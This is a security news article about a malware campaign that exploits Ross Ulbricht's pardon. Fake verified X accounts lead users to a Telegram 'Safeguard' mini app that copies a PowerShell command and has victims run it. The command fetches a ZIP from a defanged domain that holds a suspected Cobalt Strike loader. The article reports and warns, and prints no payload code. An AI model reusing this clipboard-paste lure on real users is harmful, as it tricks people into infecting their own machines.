Threat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into run PowerShell code that infects them with malware.
The attack, spotted by vx-underground, is a new variant of the “Click-Fix” tactic that has become very popular among threat actors to distribute malware over the past year.
However, instead of being fixes for common errors, this variant pretends to be a captcha or verification system that users must run to join the channel.
Last month, researchers from Guardio Labs and Infoblox researchers revealed a new campaign that utilized CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot.
Silk Road creator used as lure
Ross Ulbricht is the founder and main operator of the notorious dark web marketplace Silk Road, which acted as a hub for selling and buying illicit goods and services.
The man was sentenced to life in prison in 2015, which some found excessive given that he facilitated crimes and didn’t personally conduct them.
President Trump previously expressed the same opinion, promising to pardon Ulbricht once he became U.S. President, and yesterday, he fulfilled this promise.
Threat actors took advantage of this development, using fake but verified Ross Ulbricht accounts on X to direct people to malicious Telegram channels presented as official Ulbricht portals.
Source: BleepingComputer
On Telegram, users are met with so-called identity verification request named ‘Safeguard,’ which walks users through the fake verification process.
Source: BleepingComputer
At the end, users are shown a Telegram mini app that displays a fake verification dialog. This mini app automatically copies a PowerShell command into the device’s clipboard and then prompts the user to open the Windows Run dialog and paste it in and run it.
Source: BleepingComputer
The code copied to the clipboard downloads and executes a PowerShell script, which eventually downloads a ZIP file at http://openline[.]cyou.
This zip file contains numerous files, including identity-helper.exe [VirusTotal], which a comment on VirusTotal indicates it may be a Cobalt Strike loader.
Cobalt Strike is a penetration testing tool commonly used by threat actors to gain remote access to computer and the networks they reside on. These types of infections are commonly a precursor to ransomware and data theft attacks.
The language used throughout the verification process is carefully selected to prevent raising suspicion and maintain the false verification premise.
Users should never execute anything they copy online in their Windows ‘Run’ dialog or PowerShell terminal unless they know what they’re doing.
If unsure about something you copied on your clipboard, paste it on a text reader and analyze its contents, with any obfuscation considered a red flag.